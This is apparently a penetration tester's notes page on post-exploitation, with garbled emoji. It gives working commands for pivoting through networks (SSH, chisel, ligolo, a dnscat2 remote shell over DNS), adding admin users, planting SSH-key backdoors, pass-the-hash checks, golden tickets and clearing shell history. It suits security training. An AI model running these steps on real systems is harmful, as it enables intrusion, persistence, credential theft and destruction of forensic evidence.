Final step - Post-exploitation
Post-exploitation βοΈ is the last step of the pentester activities. Once we got access to the target, and escalated to administrator, we are trying to maintain and expand our access to other machines.
Pivoting to another victim is called lateral movement π. Target high-value hosts such as SQL or Microsoft Exchange servers.
Common activities π€
- πͺ Leave a backdoor (persistence)
- π Deface the public website
- πΈοΈ Redirect users to a malicious website/server
- π° Stealing data (files, photos, emails, source code...)
- π Stealing credentials (authentication tokens, password, keepass)
- π Mess with timestamp/... to complicate forensics
- π§Ή Cleanup logs
- β¨οΈ installing keyloggers
- 𧨠Edit software configurations/users permissions
- π² Reset user passwords to access their account
Pivoting To Another Host βοΈ
Basic Pivoting Overview
If a host has more than one network adapter (ip a
, ifconfig
, ipconfig
), we may be able to use it to move to another network.
We will assume that we have the following hosts, and we want to reach C
from A
using B
as the pivot host.
A: ["10.10.14.10"] # 10.10.10.0/8
B: ["10.10.14.100", "172.16.5.100"] # 10.10.10.0/8, 172.16.5.0/8
C: ["172.16.5.5", "172.16.10.5"] # 172.16.5.0/8, 172.16.10.0/8
D: ["172.16.10.10"] # 172.16.10.0/8
We may use:
- Tunneling π¦: we encapsulate data within another protocol. We mostly see SSH (or DNS, ICMP, and RDP) and TCP forwarding.
- Port forwarding π£οΈ: we use an agent listening between our host and the target, and forwarding message from one to the other.
Once we detect another network, we often want to find hosts. We can perform a ping sweep. For instance, with ping:
$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
cmd> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}
TCP Forwarder β socat
Refer to socat notes. For instance, to allow ligolo agent traffic on host C to reach host A, you can forward TCP traffic on B using:
$ socat TCP-LISTEN:11601,fork TCP:10.10.14.10:11601
SSH Port forwarding β SSH Command
To access 172.16.5.5:3306
, you can now use the port localhost:3389
.
$ # local_port:target:target_port
$ ssh -L 3389:172.16.5.5:3389 [...]
We can also perform reverse port forwarding, by allowing the target to connect back to a port open on our machine. Below, if any target requests the port 8880
on the jump host we are connected to, then the request will be forwarded to us at 0.0.0.0:8080
.
$ # jump_host:jump_port:our_host:our_port
$ # 0.0.0.0 is a wilcard == listen on every interface
$ # could have been: 172.16.5.100:8880:10.10.14.10:8080
$ ssh -vN -R 0.0.0.0:8880:0.0.0.0:8080 [...]
π You may use -T
(No TTY) and -N
(no remote command) and -f
(&).
SSH Tunneling β SOCKS proxy
We can use SOCKS to make it easier to interact with the target. It allows us to use dynamic port forwarding.
$ ssh -D 9050 username@10.10.14.100
SSH Tunneling β Linux Sockets
We can use SSH to tunnel Unix sockets such as docker socket:
$ ssh -L /tmp/docker.sock:/var/run/docker.sock
$ # and use /tmp/docker.sock
SSH Tunneling β sshuttle
sshuttle (11.1k β), we can dynamically access any port of a network:
$ sudo apt install -y sshuttle
$ sshuttle -r username@10.10.14.100 172.16.5.0/24
β οΈ This tool doesn't support UDP, requires sudo locally, and doesn't support well nmap scans, but it's easy to set up.
Metasploit Tunneling β SOCKS proxy
Refer to SOCKS proxy notes.
Metasploit Port Forwarding β Meterpreter
Assuming your meterpreter for your current target can use portfwd
:
meterpreter> portfwd add -R -l 8080 -p 8880 -L 0.0.0.0 # doesn't work much
meterpreter> portfwd add -l lport -p port -r target # access target:port
SSH Port Forwarding/Tunneling β PuTTY Link
PuTTY may be installed on some hosts. Refer to the SSH sections for references on what you can do. For instance:
PS> # assuming you are Host A and running Windows
PS> plink -ssh -D 9050 username@10.10.14.100
After setting up a proxy server on host A to forward all requests to localhost:9050
, you can use RDP from host A to access 172.16.5.5
.
TCP Port Forwarding β Netsh
If our jump host B is running Windows, we can use netsh
to forward all traffic received on port 13389
to 172.16.5.5:3389
.
PS> netsh.exe interface portproxy add v4tov4 listenport=13389 listenaddress=0.0.0.0 connectport=3389 connectaddress=172.16.5.5
PS> netsh.exe interface portproxy show v4tov4 # show
PS> netsh interface portproxy delete v4tov4 listenport=13389 listenaddress=0.0.0.0 # delete
DNS Tunneling β Dnscat2
dnscat2 (3.3k β, 2021 πͺ¦) is a tunneling tool wrapping data within TXT records of DNS requests. Refer to ruby notes for installation notes.
$ DEST="$HOME/tools/dnscat2"
$ git clone -b "master" https://github.com/iagox86/dnscat2.git $DEST
$ bundle install --gemfile $DEST/server/Gemfile
$ ruby $DEST/dnscat2.rb --dns host=10.10.14.10,port=53,domain=example.com --no-cache
dnscat2> window -i 1 # on client connected
You can use their client or dnscat2.ps1 (0.4k β, 2023 πͺ¦).
PS> Import-Module .\dnscat2.ps1
PS> Start-Dnscat2 -DNSserver 10.10.14.10 -Domain example.com -PreSharedSecret XXX -Exec cmd
DNS Tunneling β iodine
iodine (5.8k β) is a tunneling tool.
TCP Tunneling β rpivot SOCKS proxy
rpivot (0.5k β, 2018 πͺ¦) is a python2 SOCKS proxy over TCP. It's slow.
$ DEST="$HOME/tools/rpivot"
$ git clone -b "master" https://github.com/klsecservices/rpivot.git $DEST
$ python2.7 $DEST/server.py --proxy-port 9050 --server-port 1234 --server-ip 0.0.0.0
Upload *.py ntlm_auth
to the target host and run:
$ python2.7 client.py --server-ip 10.10.14.10 --server-port 9999
$ # can authenticate to a proxy server if needed
TCP Tunneling β Ligolo-ng
Ligolo-ng (2.1k β) is a simple and powerful fork of ligolo (1.6k β). On our host, we need to configure a network interface:
$ sudo apt install -y ligolo-ng
$ ligolo-proxy -selfcert # in another terminal, run:
$ sudo ip tuntap add user $USER mode tun ligolo
$ sudo ip link set ligolo up
$ sudo ip route add 172.16.5.0/24 dev ligolo # example
$ sudo ip tuntap delete ligolo mode tun # once you're done
On the target, download an agent and run it:
$ wget "https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_agent_0.5.2_windows_amd64.zip"
$ wget "https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_agent_0.5.2_linux_amd64.tar.gz"
$ ./agent -connect 10.10.14.10:11601 -ignore-cert
On our proxy server, we can start the tunneling. Now, we can smoothly send traffic to ligolo by defining routes and using them.
ligolo> sessions # pick one
ligolo> start # try: ping 172.16.5.5
ligolo> start --tun ligolo2 # one interface per agent
TCP Port Forwarding/Tunneling β chisel
Chisel (12.0k β) is often used to quickly set up TCP port forwarding. It's using HTTP and SSH, and can be used for tunneling (socks).
$ sudo apt install chisel
$ chisel server -p 1234 --reverse
$ chisel server -p 1234 --reverse --socks5
On the jump host, download the binary and run:
$ wget "https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz"
$ gunzip xxx.gz
$ # Ex: localhost:8080 will point to 172.16.5.5:80
$ ./chisel client 10.10.14.10:1234 R:8080:172.16.5.5:80
$ ./chisel client 10.10.14.10:1234 R:socks
In some scenarios, we can use the pivot as the server, and connect back to the pivot, but most of the time, there is a firewall.
$ chisel server -p 1234 --socks5
$ chisel client 10.10.14.100:1234 socks
ICMP Tunneling β ptunnel-ng
We can use ptunnel-ng (0.4k β) to tunnel traffic over ICMP. It requires that the target is able to reply to our host (try ping on both sides).
$ sudo apt install -y ptunnel-ng
$ git clone https://github.com/utoni/ptunnel-ng.git
$ cd ptunnel-ng && sudo ./autogen.sh
You need to upload ptunnel-ng
to the pivot host B
. Then, run:
$ sudo ./ptunnel-ng -r10.10.14.100 -R22 # Ex: 10.10.14.100:22 is behind firewall
Back on our host, we can access it at 127.0.0.1:22
using:
$ sudo ptunnel-ng -p10.10.14.100 -l2222 -r10.10.14.100 -R22
RDP Tunneling β SocksOverRDP
SocksOverRDP (1.0k β, 2022 πͺ¦) can be used on a Windows host to create a tunnel with another Windows host. It uses Dynamic Virtual Channels (DVC). First, disable AV and as administrator, run:
PS> regsvr32.exe SocksOverRDP-Plugin.dll # Download it and put it in the current folder of host A
PS> mstsc.exe # RDP to host B
hostb> .\SocksOverRDP-Server.exe
PS> netstat -antb | findstr 1080 # (still admin, should show one line)
You can access internal hosts such as host C using localhost:1080
.
Additional Pivoting Tools
Thanks to noraj for their article.
- cloudflared (7.9k β)
- Tunna (1.2k β, python TCP port forwarding using HTTP)
- PivotSuite (0.4k β, python TCP port forwarding)
- reGeorg (2.9k β, 2017 πͺ¦, TCP port forwarding using HTTP) + CN fork
Windows Post-exploitation
π° Stealing data/credentials on Windows π
You can hunt for more secrets now that you have more privileges, but the process is the same.
You can refer to Windows Pentester Notes to dump the the SAM database, DPAPI keys, Kerberos tickets, etc.
π As administrator, use HKEY_USERS
instead of HKEY_CURRENT_USER
.
πͺ Leave a backdoor on Windows
Create a new local user.
PS> net user <username> <password> /add
Add a user in the local administrator group.
PS> net localgroup administrators <username> /add
For active directory commands, refer to this.
𧨠Windows Edit software configurations
On hosts connected to active directory, folders such as %APPDATA%
are shared between machines. If we add a program in USERPROFILE\AppData\Microsoft\Windows\Start Menu\Programs\Startup
, then it will be executed when the users log in.
π Lateral Movement - Administrator Password Reuse
We can use crackmapexec/nxc to test the administrator hash or password on many hosts.
$ nxc smb --local-auth CIDR -u administrator -H hash
If LAPS was implemented, refer to LAPS.
π Lateral Movement - Find Interesting Users/Groups
Refer to LDAP.
π Lateral Movement - Golden/Silver Ticket
A golden ticket is a forged ticket (TGT) created using the KRBTGT account NTLM password hash, and the information we want (ex: expire in 10 years, associated with account XXX even if disabled/deleted, etc.).
A silver ticket is a forged ticket (TGS) created using the target service account password hash. It's similar to a golden ticket aside from the fact that it only grants access to one service.
Linux Post-exploitation
πͺ𧨠Create or edit user privileges on Linux
- Add a user with uid 0
- Add your user in special groups (shadow, disk, root)
- Edit
/etc/sudoers
π Complicate forensics on Linux
- Remove or edit the shell history file (.bash_history?)
πͺ Leave a backdoor on Linux
- Add your SSH key in
[...]/.ssh/authorized_keys
$ ssh-keygen -f mykey
$ mkdir -p $TARGET_USER_HOME/.ssh
$ cp mykey.pub $TARGET_USER_HOME/.ssh/authorized_keys
$ chmod 777 $TARGET_USER_HOME/.ssh/authorized_keys
$ ssh target@0 -i mykey
- A rootkit is a set of tools used to maintain a high level of privileges on an host by infecting system files. They can be detected using chkrootkit (simple checks) or Rootkit Hunter (use an online database)
You can use Reptile (2.5k β).
π» To-do π»
Stuff that I found, but never read/used yet.
Windows
- See also VSS
Linux
- πͺ You can give capabilities to a file with
setcap
- SSH key
- Passive attacks (monitor)
- Active attacks
- Meterpreter
- /.dockerenv (check if we are in a docker)
- KeePass (see exploitation note too?)
- Vulnerable security questions (unencrypted, easy to guess, reset passwords)
- Pass-The-Hash Attack
- rootkit, bootkit
- Credential dumping
- Forensics: clear PowerShell history